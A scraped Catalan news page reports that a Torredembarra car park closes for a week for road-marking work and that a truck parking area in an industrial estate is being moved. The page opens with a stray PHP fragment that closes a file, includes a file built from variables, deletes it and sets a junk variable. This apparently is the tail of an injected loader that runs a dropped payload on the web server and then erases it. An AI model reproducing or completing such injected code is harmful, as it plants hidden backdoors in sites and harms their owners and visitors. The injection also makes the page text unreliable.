");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L’aparcament de Mañé i Flaquer de Torredembarra tancarà una setmana pels treballs de pintura de la nova senyalització horitzontal
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L’aparcament de Mañé i Flaquer de Torredembarra tancarà una setmana pels treballs de pintura de la nova senyalització horitzontal (02/03/2020)

L’aparcament de Mañé i Flaquer restarà tancat aquesta setmana, excepte per al mercat dels dimarts, per uns treballs de pintura de la nova senyalització horitzontal. L’objectiu és millorar la viabilitat interna del pàrquing, així com els accessos tant dels vehicles com dels vianants. Aquesta actuació va a càrrec de la Regidoria de Via Pública i Manteniment de l’Ajuntament de Torredembarra.

La mateixa regidoria ha previst una altra actuació de viabilitat al polígon industrial Roques Planes. Es tracta d’un canvi en la ubicació de l’aparcament per a camions, que es traslladarà del carrer del Sol Ponent al carrer del Migdia, on ja es troba un lavabo públic que es posarà en servei i també la zona de pícnic pensada per als camioners. Dimarts vinent és el dia previst per a les tasques de pintura del nou espai.

Font: Ajuntament de Torredembarra

L’aparcament de Mañé i Flaquer de Torredembarra tancarà una setmana pels treballs de pintura de la nova senyalització horitzontal

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona